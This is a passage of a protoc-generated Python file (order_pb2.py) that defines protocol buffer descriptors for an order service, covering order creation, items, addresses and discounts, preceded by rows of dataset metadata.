| 0.858696
| 0
| 0.005435
| 0.048029
| 0
| 0
| 0
| 0.000983
| 0
| 0.255435
| 1
| 0.038043
| false
| 0
| 0.043478
| 0
| 0.086957
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
fc47d5b66a5a988791e125c97e184356a89579e2
| 105,224
|
py
|
Python
|
example/src/order_stub/order_pb2.py
|
DDS-DS/pytest-grpc
|
a4df9263324fc584c1b4f4a796a2f8424dd56b2b
|
[
"MIT"
] | null | null | null |
example/src/order_stub/order_pb2.py
|
DDS-DS/pytest-grpc
|
a4df9263324fc584c1b4f4a796a2f8424dd56b2b
|
[
"MIT"
] | null | null | null |
example/src/order_stub/order_pb2.py
|
DDS-DS/pytest-grpc
|
a4df9263324fc584c1b4f4a796a2f8424dd56b2b
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
# Generated by the protocol buffer compiler. DO NOT EDIT!
# source: order.proto
"""Generated protocol buffer code."""
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
import order_review_pb2 as order__review__pb2
import order_settlement_pb2 as order__settlement__pb2
import code_pb2 as code__pb2
import settlement_pb2 as settlement__pb2
DESCRIPTOR = _descriptor.FileDescriptor(
name='order.proto',
package='order',
syntax='proto3',
serialized_options=b'Z\027app/protocol/grpc/order',
create_key=_descriptor._internal_create_key,
serialized_pb=b'\n\x0border.proto\x12\x05order\x1a\x12order_review.proto\x1a\x16order_settlement.proto\x1a\ncode.proto\x1a\x10settlement.proto\"r\n\x0eOrderCreateReq\x12\x0f\n\x07user_id\x18\x01 \x01(\t\x12\x10\n\x08username\x18\x02 \x01(\t\x12\x15\n\rbusiness_code\x18\x03 \x01(\t\x12&\n\x06orders\x18\x04 \x03(\x0b\x32\x16.order.OrderCreateInfo\"\xef\x02\n\x0fOrderCreateInfo\x12\x0f\n\x07\x63ountry\x18\x01 \x01(\t\x12\x12\n\norder_type\x18\x02 \x01(\t\x12/\n\x0border_items\x18\x03 \x03(\x0b\x32\x1a.order.OrderItemCreateInfo\x12\x18\n\x10logistics_amount\x18\x04 \x01(\x03\x12\x16\n\x0epayment_method\x18\x05 \x01(\t\x12.\n\x07\x61\x64\x64ress\x18\x06 \x01(\x0b\x32\x1d.order.OrderAddressCreateInfo\x12\x32\n\x06labels\x18\x07 \x03(\x0b\x32\".order.OrderCreateInfo.LabelsEntry\x12\x0e\n\x06remark\x18\x08 \x01(\t\x12\x31\n\tdiscounts\x18\t \x03(\x0b\x32\x1e.order.OrderDiscountCreateInfo\x1a-\n\x0bLabelsEntry\x12\x0b\n\x03key\x18\x01 \x01(\t\x12\r\n\x05value\x18\x02 \x01(\t:\x02\x38\x01\"o\n\x13OrderItemCreateInfo\x12\x0f\n\x07item_id\x18\x01 \x01(\t\x12\x0e\n\x06spu_id\x18\x02 \x01(\t\x12\x0e\n\x06sku_id\x18\x03 \x01(\t\x12\x15\n\rbind_item_ids\x18\x04 \x03(\t\x12\x10\n\x08quantity\x18\x05 \x01(\x05\"\xcd\x01\n\x16OrderAddressCreateInfo\x12\x0c\n\x04name\x18\x01 \x01(\t\x12\x0e\n\x06mobile\x18\x02 \x01(\t\x12\x0f\n\x07\x63ountry\x18\x03 \x01(\t\x12\r\n\x05state\x18\x04 \x01(\t\x12\x0c\n\x04\x63ity\x18\x05 \x01(\t\x12\x10\n\x08\x64istrict\x18\x06 \x01(\t\x12\x0e\n\x06\x64\x65tail\x18\x07 \x01(\t\x12\x10\n\x08postcode\x18\x08 \x01(\t\x12\r\n\x05\x65mail\x18\t \x01(\t\x12\x0c\n\x04ward\x18\n \x01(\t\x12\x16\n\x0erecharge_phone\x18\x0b \x01(\t\"a\n\x17OrderDiscountCreateInfo\x12\x15\n\rdiscount_type\x18\x01 \x01(\t\x12/\n\rdiscount_info\x18\x02 \x01(\x0b\x32\x18.order.OrderDiscountInfo\"D\n\x11OrderDiscountInfo\x12\x0e\n\x06\x61mount\x18\x01 \x01(\x03\x12\x10\n\x08\x63urrency\x18\x02 \x01(\t\x12\r\n\x05value\x18\x03 
\x01(\t\"c\n\x0fOrderListResult\x12\x1a\n\x04\x64\x61ta\x18\x01 \x03(\x0b\x32\x0c.order.Order\x12\r\n\x05total\x18\x02 \x01(\x03\x12\x18\n\x04\x63ode\x18\x03 \x01(\x0e\x32\n.code.Code\x12\x0b\n\x03msg\x18\x04 \x01(\t\"\x81\x01\n\x11OrderCreateResult\x12\x1c\n\x06orders\x18\x01 \x03(\x0b\x32\x0c.order.Order\x12\'\n\x06\x65rrors\x18\x02 \x03(\x0b\x32\x17.order.CreateOrderError\x12\x18\n\x04\x63ode\x18\x03 \x01(\x0e\x32\n.code.Code\x12\x0b\n\x03msg\x18\x04 \x01(\t\"<\n\x10\x43reateOrderError\x12\r\n\x05index\x18\x01 \x01(\x05\x12\x0c\n\x04\x63ode\x18\x02 \x01(\x05\x12\x0b\n\x03msg\x18\x03 \x01(\t\"\xef\x02\n\x16MerchantOrderCreateReq\x12\x18\n\x10\x63ustomer_user_id\x18\x01 \x01(\t\x12\x18\n\x10merchant_user_id\x18\x02 \x01(\t\x12\x15\n\rbusiness_code\x18\x03 \x01(\t\x12\x10\n\x08store_id\x18\x04 \x01(\t\x12\x0f\n\x07\x63ountry\x18\x05 \x01(\t\x12\x12\n\norder_type\x18\x06 \x01(\t\x12\x14\n\x0ctotal_amount\x18\x07 \x01(\x03\x12\x0e\n\x06remark\x18\x08 \x01(\t\x12\x39\n\x06labels\x18\t \x03(\x0b\x32).order.MerchantOrderCreateReq.LabelsEntry\x12\x31\n\tdiscounts\x18\n \x03(\x0b\x32\x1e.order.OrderDiscountCreateInfo\x12\x10\n\x08\x63urrency\x18\x0b \x01(\t\x1a-\n\x0bLabelsEntry\x12\x0b\n\x03key\x18\x01 \x01(\t\x12\r\n\x05value\x18\x02 \x01(\t:\x02\x38\x01\"_\n\x19MerchantOrderCreateResult\x12\x18\n\x04\x63ode\x18\x01 \x01(\x0e\x32\n.code.Code\x12\x0b\n\x03msg\x18\x02 \x01(\t\x12\x1b\n\x05order\x18\x03 \x01(\x0b\x32\x0c.order.Order\"\xa2\x06\n\x05Order\x12\n\n\x02id\x18\x01 \x01(\t\x12\x0f\n\x07user_id\x18\x02 \x01(\t\x12\x12\n\norder_type\x18\x03 \x01(\t\x12\x0e\n\x06status\x18\x04 \x01(\t\x12\x14\n\x0ctotal_amount\x18\x06 \x01(\x03\x12\x14\n\x0citems_amount\x18\x07 \x01(\x03\x12\x18\n\x10logistics_amount\x18\x08 \x01(\x03\x12\x17\n\x0f\x64iscount_amount\x18\t \x01(\x03\x12\x10\n\x08\x63urrency\x18\n \x01(\t\x12\x0f\n\x07\x63ountry\x18\x0b \x01(\t\x12\x16\n\x0e\x66ulfill_method\x18\x0c \x01(\t\x12\x10\n\x08store_id\x18\r \x01(\t\x12+\n\x0breview_info\x18\x0e 
\x01(\x0b\x32\x16.order.OrderReviewInfo\x12\x15\n\rcancel_reason\x18\x10 \x01(\t\x12\x17\n\x0fplatform_remark\x18\x11 \x01(\t\x12\x15\n\rseller_remark\x18\x12 \x01(\t\x12\x13\n\x0buser_remark\x18\x13 \x01(\t\x12\x11\n\tcreate_at\x18\x14 \x01(\x03\x12\x11\n\tupdate_at\x18\x15 \x01(\x03\x12\x1f\n\x05items\x18\x16 \x03(\x0b\x32\x10.order.OrderItem\x12$\n\x07\x61\x64\x64ress\x18\x17 \x01(\x0b\x32\x13.order.OrderAddress\x12\x14\n\x0cpayment_type\x18\x18 \x01(\t\x12\x13\n\x0b\x63ost_amount\x18\x19 \x01(\x03\x12\x15\n\rbusiness_code\x18\x1a \x01(\t\x12\x15\n\rbusiness_type\x18\x1b \x01(\t\x12(\n\x06labels\x18\x1c \x03(\x0b\x32\x18.order.Order.LabelsEntry\x12\x11\n\tcancel_at\x18\x1d \x01(\x03\x12\x15\n\rreturn_remark\x18\x1e \x01(\t\x12\x11\n\treturn_at\x18\x1f \x01(\x03\x12-\n\x0bsettlements\x18 \x03(\x0b\x32\x18.order.OrderSettlementV2\x12\x18\n\x10merchant_user_id\x18! \x01(\t\x1a-\n\x0bLabelsEntry\x12\x0b\n\x03key\x18\x01 \x01(\t\x12\r\n\x05value\x18\x02 \x01(\t:\x02\x38\x01\"\xa2\x06\n\tOrderItem\x12\x0f\n\x07item_id\x18\x0c \x01(\t\x12\x0e\n\x06spu_id\x18\x01 \x01(\t\x12\x0e\n\x06sku_id\x18\x02 \x01(\t\x12\r\n\x05title\x18\x03 \x01(\t\x12\r\n\x05image\x18\x04 \x01(\t\x12/\n\x08sku_prop\x18\x05 \x03(\x0b\x32\x1d.order.OrderItem.SkuPropEntry\x12\x17\n\x0foriginal_amount\x18\x06 \x01(\x03\x12\x13\n\x0bsale_amount\x18\x07 \x01(\x03\x12\x17\n\x0f\x64iscount_amount\x18\x08 \x01(\x03\x12\x14\n\x0ctotal_amount\x18\t \x01(\x03\x12\x10\n\x08\x63urrency\x18\n \x01(\t\x12\x10\n\x08quantity\x18\x0b \x01(\x03\x12\x13\n\x0b\x63ost_amount\x18\x0e \x01(\x03\x12\x10\n\x08store_id\x18\x0f \x01(\t\x12\x14\n\x0cproduct_type\x18\x10 \x01(\t\x12\x15\n\rbusiness_type\x18\x11 \x01(\t\x12\x13\n\x0bsupplier_id\x18\x12 \x01(\t\x12\x1c\n\x10user_rebate_rate\x18\x13 \x01(\x01\x42\x02\x18\x01\x12\x1b\n\x13\x63hannel_rebate_rate\x18\x14 \x01(\x01\x12\x15\n\rbind_item_ids\x18\x15 \x03(\t\x12,\n\x06labels\x18\x16 \x03(\x0b\x32\x1c.order.OrderItem.LabelsEntry\x12\x13\n\x0b\x63\x61tegory_id\x18\x17 
\x01(\t\x12 \n\x18user_rebate_amount_limit\x18\x18 \x01(\x03\x12*\n\x1emerchant_apportion_rebate_rate\x18\x19 \x01(\x01\x42\x02\x18\x01\x12*\n\x1eplatform_apportion_rebate_rate\x18\x1a \x01(\x01\x42\x02\x18\x01\x12=\n\x15gradient_rebate_rates\x18\x1b \x03(\x0b\x32\x1e.settlement.GradientRebateRate\x1a.\n\x0cSkuPropEntry\x12\x0b\n\x03key\x18\x01 \x01(\t\x12\r\n\x05value\x18\x02 \x01(\t:\x02\x38\x01\x1a-\n\x0bLabelsEntry\x12\x0b\n\x03key\x18\x01 \x01(\t\x12\r\n\x05value\x18\x02 \x01(\t:\x02\x38\x01\"\xc3\x01\n\x0cOrderAddress\x12\x0c\n\x04name\x18\x01 \x01(\t\x12\x0e\n\x06mobile\x18\x02 \x01(\t\x12\x0f\n\x07\x63ountry\x18\x03 \x01(\t\x12\r\n\x05state\x18\x04 \x01(\t\x12\x0c\n\x04\x63ity\x18\x05 \x01(\t\x12\x10\n\x08\x64istrict\x18\x06 \x01(\t\x12\x0e\n\x06\x64\x65tail\x18\x07 \x01(\t\x12\x10\n\x08postcode\x18\x08 \x01(\t\x12\r\n\x05\x65mail\x18\t \x01(\t\x12\x0c\n\x04ward\x18\n \x01(\t\x12\x16\n\x0erecharge_phone\x18\x0b \x01(\t\"\xba\x01\n\x12OrderUpdateContent\x12\x15\n\rbusiness_code\x18\x01 \x01(\t\x12\x10\n\x08order_id\x18\x02 \x01(\t\x12\x0f\n\x07user_id\x18\x03 \x01(\t\x12\x10\n\x08username\x18\x04 \x01(\t\x12\x0e\n\x06\x61\x63tion\x18\x05 \x01(\t\x12\x35\n\raction_params\x18\x06 \x01(\x0b\x32\x1e.order.OrderUpdateActionParams\x12\x11\n\tuser_type\x18\x07 \x01(\t\"\xb1\x03\n\x17OrderUpdateActionParams\x12\x15\n\rreview_method\x18\x01 \x01(\t\x12\x15\n\rreview_remark\x18\x02 \x01(\t\x12\x15\n\rcancel_reason\x18\x03 \x01(\t\x12\x17\n\x0fplatform_remark\x18\x04 \x01(\t\x12\x15\n\rseller_remark\x18\x05 \x01(\t\x12\x12\n\nstr_param1\x18\x06 \x01(\t\x12\x12\n\nint_param1\x18\x07 \x01(\x03\x12\x15\n\rreturn_remark\x18\x08 \x01(\t\x12\x30\n\x08packages\x18\t \x03(\x0b\x32\x1e.order.OrderPackageUpdateParam\x12:\n\x06labels\x18\n \x03(\x0b\x32*.order.OrderUpdateActionParams.LabelsEntry\x12/\n\x07\x61\x64\x64ress\x18\x0b \x01(\x0b\x32\x1e.order.OrderAddressUpdateParam\x12\x14\n\x0ctotal_amount\x18\x0c \x01(\x03\x1a-\n\x0bLabelsEntry\x12\x0b\n\x03key\x18\x01 
\x01(\t\x12\r\n\x05value\x18\x02 \x01(\t:\x02\x38\x01\"^\n\x17OrderPackageUpdateParam\x12\x10\n\x08item_ids\x18\x01 \x03(\t\x12\x1c\n\x14logistics_company_id\x18\x02 \x01(\t\x12\x13\n\x0btracking_no\x18\x03 \x01(\t\"\xce\x01\n\x17OrderAddressUpdateParam\x12\x0c\n\x04name\x18\x01 \x01(\t\x12\x0e\n\x06mobile\x18\x02 \x01(\t\x12\x0f\n\x07\x63ountry\x18\x03 \x01(\t\x12\r\n\x05state\x18\x04 \x01(\t\x12\x0c\n\x04\x63ity\x18\x05 \x01(\t\x12\x10\n\x08\x64istrict\x18\x06 \x01(\t\x12\x0c\n\x04ward\x18\x07 \x01(\t\x12\x0e\n\x06\x64\x65tail\x18\x08 \x01(\t\x12\x10\n\x08postcode\x18\t \x01(\t\x12\r\n\x05\x65mail\x18\n \x01(\t\x12\x16\n\x0erecharge_phone\x18\x0b \x01(\tB\x19Z\x17\x61pp/protocol/grpc/orderb\x06proto3'
,
dependencies=[order__review__pb2.DESCRIPTOR,order__settlement__pb2.DESCRIPTOR,code__pb2.DESCRIPTOR,settlement__pb2.DESCRIPTOR,])
# Generated Descriptor for the order.OrderCreateReq message (protoc output;
# keep in sync with order.proto -- do not edit by hand).
_ORDERCREATEREQ = _descriptor.Descriptor(
  name='OrderCreateReq',
  full_name='order.OrderCreateReq',
  filename=None,
  file=DESCRIPTOR,
  containing_type=None,
  create_key=_descriptor._internal_create_key,
  fields=[
    # string user_id = 1;
    _descriptor.FieldDescriptor(
      name='user_id', full_name='order.OrderCreateReq.user_id', index=0,
      number=1, type=9, cpp_type=9, label=1,
      has_default_value=False, default_value=b"".decode('utf-8'),
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
    # string username = 2;
    _descriptor.FieldDescriptor(
      name='username', full_name='order.OrderCreateReq.username', index=1,
      number=2, type=9, cpp_type=9, label=1,
      has_default_value=False, default_value=b"".decode('utf-8'),
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
    # string business_code = 3;
    _descriptor.FieldDescriptor(
      name='business_code', full_name='order.OrderCreateReq.business_code', index=2,
      number=3, type=9, cpp_type=9, label=1,
      has_default_value=False, default_value=b"".decode('utf-8'),
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
    # repeated message orders = 4 (message_type resolved later from serialized_pb).
    _descriptor.FieldDescriptor(
      name='orders', full_name='order.OrderCreateReq.orders', index=3,
      number=4, type=11, cpp_type=10, label=3,
      has_default_value=False, default_value=[],
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
  ],
  extensions=[
  ],
  nested_types=[],
  enum_types=[
  ],
  serialized_options=None,
  is_extendable=False,
  syntax='proto3',
  extension_ranges=[],
  oneofs=[
  ],
  # Byte offsets of this message definition inside DESCRIPTOR's serialized_pb.
  serialized_start=96,
  serialized_end=210,
)
# Generated Descriptor for the synthetic map-entry message backing
# OrderCreateInfo.labels (map<string, string>); protoc output -- do not edit.
_ORDERCREATEINFO_LABELSENTRY = _descriptor.Descriptor(
  name='LabelsEntry',
  full_name='order.OrderCreateInfo.LabelsEntry',
  filename=None,
  file=DESCRIPTOR,
  containing_type=None,
  create_key=_descriptor._internal_create_key,
  fields=[
    # string key = 1;
    _descriptor.FieldDescriptor(
      name='key', full_name='order.OrderCreateInfo.LabelsEntry.key', index=0,
      number=1, type=9, cpp_type=9, label=1,
      has_default_value=False, default_value=b"".decode('utf-8'),
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
    # string value = 2;
    _descriptor.FieldDescriptor(
      name='value', full_name='order.OrderCreateInfo.LabelsEntry.value', index=1,
      number=2, type=9, cpp_type=9, label=1,
      has_default_value=False, default_value=b"".decode('utf-8'),
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
  ],
  extensions=[
  ],
  nested_types=[],
  enum_types=[
  ],
  # b'8\001' encodes the map_entry=true message option.
  serialized_options=b'8\001',
  is_extendable=False,
  syntax='proto3',
  extension_ranges=[],
  oneofs=[
  ],
  # Byte offsets of this message definition inside DESCRIPTOR's serialized_pb.
  serialized_start=535,
  serialized_end=580,
)
# Generated Descriptor for the order.OrderCreateInfo message (per-order payload
# of OrderCreateReq); protoc output -- do not edit by hand.
_ORDERCREATEINFO = _descriptor.Descriptor(
  name='OrderCreateInfo',
  full_name='order.OrderCreateInfo',
  filename=None,
  file=DESCRIPTOR,
  containing_type=None,
  create_key=_descriptor._internal_create_key,
  fields=[
    # string country = 1;
    _descriptor.FieldDescriptor(
      name='country', full_name='order.OrderCreateInfo.country', index=0,
      number=1, type=9, cpp_type=9, label=1,
      has_default_value=False, default_value=b"".decode('utf-8'),
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
    # string order_type = 2;
    _descriptor.FieldDescriptor(
      name='order_type', full_name='order.OrderCreateInfo.order_type', index=1,
      number=2, type=9, cpp_type=9, label=1,
      has_default_value=False, default_value=b"".decode('utf-8'),
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
    # repeated message order_items = 3;
    _descriptor.FieldDescriptor(
      name='order_items', full_name='order.OrderCreateInfo.order_items', index=2,
      number=3, type=11, cpp_type=10, label=3,
      has_default_value=False, default_value=[],
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
    # int64 logistics_amount = 4;
    _descriptor.FieldDescriptor(
      name='logistics_amount', full_name='order.OrderCreateInfo.logistics_amount', index=3,
      number=4, type=3, cpp_type=2, label=1,
      has_default_value=False, default_value=0,
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
    # string payment_method = 5;
    _descriptor.FieldDescriptor(
      name='payment_method', full_name='order.OrderCreateInfo.payment_method', index=4,
      number=5, type=9, cpp_type=9, label=1,
      has_default_value=False, default_value=b"".decode('utf-8'),
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
    # message address = 6;
    _descriptor.FieldDescriptor(
      name='address', full_name='order.OrderCreateInfo.address', index=5,
      number=6, type=11, cpp_type=10, label=1,
      has_default_value=False, default_value=None,
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
    # repeated message labels = 7 (map entry, see _ORDERCREATEINFO_LABELSENTRY).
    _descriptor.FieldDescriptor(
      name='labels', full_name='order.OrderCreateInfo.labels', index=6,
      number=7, type=11, cpp_type=10, label=3,
      has_default_value=False, default_value=[],
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
    # string remark = 8;
    _descriptor.FieldDescriptor(
      name='remark', full_name='order.OrderCreateInfo.remark', index=7,
      number=8, type=9, cpp_type=9, label=1,
      has_default_value=False, default_value=b"".decode('utf-8'),
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
    # repeated message discounts = 9;
    _descriptor.FieldDescriptor(
      name='discounts', full_name='order.OrderCreateInfo.discounts', index=8,
      number=9, type=11, cpp_type=10, label=3,
      has_default_value=False, default_value=[],
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
  ],
  extensions=[
  ],
  nested_types=[_ORDERCREATEINFO_LABELSENTRY, ],
  enum_types=[
  ],
  serialized_options=None,
  is_extendable=False,
  syntax='proto3',
  extension_ranges=[],
  oneofs=[
  ],
  # Byte offsets of this message definition inside DESCRIPTOR's serialized_pb.
  serialized_start=213,
  serialized_end=580,
)
# Generated Descriptor for the order.OrderItemCreateInfo message (one line item
# inside an OrderCreateInfo); protoc output -- do not edit by hand.
_ORDERITEMCREATEINFO = _descriptor.Descriptor(
  name='OrderItemCreateInfo',
  full_name='order.OrderItemCreateInfo',
  filename=None,
  file=DESCRIPTOR,
  containing_type=None,
  create_key=_descriptor._internal_create_key,
  fields=[
    # string item_id = 1;
    _descriptor.FieldDescriptor(
      name='item_id', full_name='order.OrderItemCreateInfo.item_id', index=0,
      number=1, type=9, cpp_type=9, label=1,
      has_default_value=False, default_value=b"".decode('utf-8'),
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
    # string spu_id = 2;
    _descriptor.FieldDescriptor(
      name='spu_id', full_name='order.OrderItemCreateInfo.spu_id', index=1,
      number=2, type=9, cpp_type=9, label=1,
      has_default_value=False, default_value=b"".decode('utf-8'),
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
    # string sku_id = 3;
    _descriptor.FieldDescriptor(
      name='sku_id', full_name='order.OrderItemCreateInfo.sku_id', index=2,
      number=3, type=9, cpp_type=9, label=1,
      has_default_value=False, default_value=b"".decode('utf-8'),
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
    # repeated string bind_item_ids = 4;
    _descriptor.FieldDescriptor(
      name='bind_item_ids', full_name='order.OrderItemCreateInfo.bind_item_ids', index=3,
      number=4, type=9, cpp_type=9, label=3,
      has_default_value=False, default_value=[],
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
    # int32 quantity = 5;
    _descriptor.FieldDescriptor(
      name='quantity', full_name='order.OrderItemCreateInfo.quantity', index=4,
      number=5, type=5, cpp_type=1, label=1,
      has_default_value=False, default_value=0,
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
  ],
  extensions=[
  ],
  nested_types=[],
  enum_types=[
  ],
  serialized_options=None,
  is_extendable=False,
  syntax='proto3',
  extension_ranges=[],
  oneofs=[
  ],
  # Byte offsets of this message definition inside DESCRIPTOR's serialized_pb.
  serialized_start=582,
  serialized_end=693,
)
# Generated Descriptor for the order.OrderAddressCreateInfo message (shipping
# address supplied at order creation); protoc output -- do not edit by hand.
# All eleven fields are optional proto3 strings (field numbers 1-11).
_ORDERADDRESSCREATEINFO = _descriptor.Descriptor(
  name='OrderAddressCreateInfo',
  full_name='order.OrderAddressCreateInfo',
  filename=None,
  file=DESCRIPTOR,
  containing_type=None,
  create_key=_descriptor._internal_create_key,
  fields=[
    _descriptor.FieldDescriptor(
      name='name', full_name='order.OrderAddressCreateInfo.name', index=0,
      number=1, type=9, cpp_type=9, label=1,
      has_default_value=False, default_value=b"".decode('utf-8'),
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
    _descriptor.FieldDescriptor(
      name='mobile', full_name='order.OrderAddressCreateInfo.mobile', index=1,
      number=2, type=9, cpp_type=9, label=1,
      has_default_value=False, default_value=b"".decode('utf-8'),
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
    _descriptor.FieldDescriptor(
      name='country', full_name='order.OrderAddressCreateInfo.country', index=2,
      number=3, type=9, cpp_type=9, label=1,
      has_default_value=False, default_value=b"".decode('utf-8'),
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
    _descriptor.FieldDescriptor(
      name='state', full_name='order.OrderAddressCreateInfo.state', index=3,
      number=4, type=9, cpp_type=9, label=1,
      has_default_value=False, default_value=b"".decode('utf-8'),
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
    _descriptor.FieldDescriptor(
      name='city', full_name='order.OrderAddressCreateInfo.city', index=4,
      number=5, type=9, cpp_type=9, label=1,
      has_default_value=False, default_value=b"".decode('utf-8'),
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
    _descriptor.FieldDescriptor(
      name='district', full_name='order.OrderAddressCreateInfo.district', index=5,
      number=6, type=9, cpp_type=9, label=1,
      has_default_value=False, default_value=b"".decode('utf-8'),
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
    _descriptor.FieldDescriptor(
      name='detail', full_name='order.OrderAddressCreateInfo.detail', index=6,
      number=7, type=9, cpp_type=9, label=1,
      has_default_value=False, default_value=b"".decode('utf-8'),
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
    _descriptor.FieldDescriptor(
      name='postcode', full_name='order.OrderAddressCreateInfo.postcode', index=7,
      number=8, type=9, cpp_type=9, label=1,
      has_default_value=False, default_value=b"".decode('utf-8'),
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
    _descriptor.FieldDescriptor(
      name='email', full_name='order.OrderAddressCreateInfo.email', index=8,
      number=9, type=9, cpp_type=9, label=1,
      has_default_value=False, default_value=b"".decode('utf-8'),
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
    _descriptor.FieldDescriptor(
      name='ward', full_name='order.OrderAddressCreateInfo.ward', index=9,
      number=10, type=9, cpp_type=9, label=1,
      has_default_value=False, default_value=b"".decode('utf-8'),
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
    _descriptor.FieldDescriptor(
      name='recharge_phone', full_name='order.OrderAddressCreateInfo.recharge_phone', index=10,
      number=11, type=9, cpp_type=9, label=1,
      has_default_value=False, default_value=b"".decode('utf-8'),
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
  ],
  extensions=[
  ],
  nested_types=[],
  enum_types=[
  ],
  serialized_options=None,
  is_extendable=False,
  syntax='proto3',
  extension_ranges=[],
  oneofs=[
  ],
  # Byte offsets of this message definition inside DESCRIPTOR's serialized_pb.
  serialized_start=696,
  serialized_end=901,
)
# Generated Descriptor for the order.OrderDiscountCreateInfo message (a typed
# discount attached at order creation); protoc output -- do not edit by hand.
_ORDERDISCOUNTCREATEINFO = _descriptor.Descriptor(
  name='OrderDiscountCreateInfo',
  full_name='order.OrderDiscountCreateInfo',
  filename=None,
  file=DESCRIPTOR,
  containing_type=None,
  create_key=_descriptor._internal_create_key,
  fields=[
    # string discount_type = 1;
    _descriptor.FieldDescriptor(
      name='discount_type', full_name='order.OrderDiscountCreateInfo.discount_type', index=0,
      number=1, type=9, cpp_type=9, label=1,
      has_default_value=False, default_value=b"".decode('utf-8'),
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
    # message discount_info = 2 (resolved later from serialized_pb).
    _descriptor.FieldDescriptor(
      name='discount_info', full_name='order.OrderDiscountCreateInfo.discount_info', index=1,
      number=2, type=11, cpp_type=10, label=1,
      has_default_value=False, default_value=None,
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
